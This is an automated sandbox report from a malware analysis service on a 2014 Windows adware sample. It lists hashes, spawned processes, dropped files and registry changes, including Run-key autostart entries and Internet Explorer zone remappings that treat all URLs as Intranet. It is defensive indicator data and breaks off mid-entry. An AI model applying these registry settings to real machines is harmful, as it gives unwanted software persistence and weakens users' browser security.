Gen.Variant.Adware.Kazy.264370_10a837ecb7

by malwarelabrobot on December 4th, 2014 in Malware Descriptions.

not-a-virus:HEUR:AdWare.Win32.Hebogo.heur (Kaspersky), Gen:Variant.Adware.Kazy.264370 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 10a837ecb7ad77be14a8f216ba9a27e9
SHA1: 11d9aedc425fa5fb9a06b5b8dc319b6658f585bf
SHA256: 66885e026bb7aa65ff002868645f61ebc563e55ccca86352d8508fa8e84c939e
SSDeep: 24576:KcgCYQ1LGum4sx8Kofd/uV wn0f7fGJDye:pgCh1LGumhuW DzGJye
Size: 865832 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-11-06 21:53:27
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.

Payload

No specific payload has been found.

Process activity

The PUP creates the following process(es):

GuardConvert.exe:1104
MicroProProc.exe:2020
MicroProProc.exe:596
MicroProCon.exe:1492
%original file name%.exe:452
WinCtrCon.exe:1684
WinCtrProc.exe:600
mscorsvw.exe:172
irsetup.exe:956

The PUP injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process GuardConvert.exe:1104 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ServerList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\desktop.ini (67 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFB18F.tmp (0 bytes)

The process MicroProProc.exe:2020 makes changes in the file system.
The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF7AE0.tmp (0 bytes)

The process MicroProProc.exe:596 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\UCg_LPrMLab[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrCon[1].exe (52969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (52969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\FcPimSLab[1].htm (157 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF5D4B.tmp (0 bytes)

The process MicroProCon.exe:1492 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\ServerList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormChecktimemicroLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\MicroProProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\ProgramUpdateLab[1].htm (21 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe (409017 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFB189.tmp (0 bytes)

The process %original file name%.exe:452 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (1861 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process WinCtrCon.exe:1684 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrProc[1].exe (418761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (418761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FcTimeLab[1].htm (157 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF8DD3.tmp (0 bytes)

The process WinCtrProc.exe:600 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\UCg_LPrMLab[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\FcPimSLab[1].htm (157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\TransSiteString[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\keyword_platinum[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\Uninstall_Ctr[1].exe (89729 bytes)

The process irsetup.exe:956 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe (2712 bytes)
%System%\VB6KO.DLL (2712 bytes)
%System%\MSINET.OCX (2784 bytes)
%Documents and Settings%\%current user%\Application Data\GuardSupport\GuardConvert.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.dat (2712 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uniB4.tmp (15807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.xml (930 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe (4102 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG1.JPG (2 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uniB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

Registry activity

The process GuardConvert.exe:1104 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCR\InetCtls.Inet.1]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\InetCtls.Inet\CurVer]
"(Default)" = "InetCtls.Inet.1"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}]
"(Default)" = "DInetEvents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\InetCtls.Inet.1\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS]
"(Default)" = "2"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
"(Default)" = "132497"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\InetCtls.Inet\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\InetCtls.Inet]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}]
"(Default)" = "IInet"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
"(Default)" = "InetCtls.Inet.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32]
"(Default)" = "%System%\MSINET.OCX"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control General Property Page Object"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
"(Default)" = "InetCtls.Inet"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 6A 6A 50 87 E1 38 3C 79 74 A0 13 B2 21 24 EC"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control URL Property Page Object"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
"(Default)" = "%System%\MSINET.OCX, 1"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The PUP deletes the following registry key(s):

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

The process MicroProProc.exe:2020 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 3D 67 DB 4E 00 19 0D CA 9D 18 1D 48 AF D4 B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process MicroProProc.exe:596 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCU\Software\WinCtrView]
"USER_NO" = "3"
"SUBNAME" = "MAIN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\WinCtrView]
"AdFlag" = "Y"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\WinCtrView]
"Upmom" = "Y"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\WinCtrView]
"Intro_No" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\WinCtrView]
"Version" = "1660"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 9D 04 EC CF 03 57 7D F0 16 1B F5 73 BA 0C 9A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the PUP adds the following reference to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -GbRIWgPPC"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the PUP adds the following reference to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -GbRIWgPPC"

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"

The PUP disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"

The process MicroProCon.exe:1492 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCR\InetCtls.Inet.1]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\InetCtls.Inet\CurVer]
"(Default)" = "InetCtls.Inet.1"

[HKCU\Software\MicroLab]
"Upmom" = "N"
"USER_NO" = "3030"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\MicroLab]
"MomDate" = "12/3/2014"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\InetCtls.Inet.1\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
"(Default)" = "132497"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\InetCtls.Inet\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\InetCtls.Inet]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
"(Default)" = "InetCtls.Inet.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control General Property Page Object"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\MicroLab]
"Commit" = "N"
"firstTime" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
